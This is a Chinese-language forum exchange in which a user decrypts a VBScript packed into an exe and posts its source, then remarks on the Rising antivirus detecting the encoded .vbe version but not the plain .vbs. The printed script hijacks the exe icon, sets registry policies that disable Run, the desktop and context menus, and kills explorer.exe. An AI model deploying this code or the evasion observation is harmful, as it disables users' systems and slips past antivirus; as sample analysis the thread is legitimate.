强悍的一只

RandomOS

我又研究了下 其实这个就是一个vbs加密后打包成的exe文件 顺便把它的加密破了 源码如下
set ws=wscript.createobject("wscript.shell")
ws.Regwrite "HKCR\exefile\DefaultIcon\","c:\QQ.ico"
ws.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
ws.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD"
ws.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD"

Set objWMIService = GetObject("winmgmts:\\" & "." & "\root\cimv2")
Set process = objWMIService.ExecQuery("SELECT * FROM Win32_process where name='explorer.exe'")
for each proc in process
   proc.terminate()
next

这就是源码 [:23:]

RandomOS

我的杀毒软件是瑞星，得到这个包的时候没杀出来。后来看到25楼的朋友用瑞星查出后，我又试了下，结果查出来了。这就是瑞星的云安全吗？反应挺快的。
但我又发现件很雷的事，瑞星可以查出上述代码加密後的vbe文件，但解密後的vbs却查不到。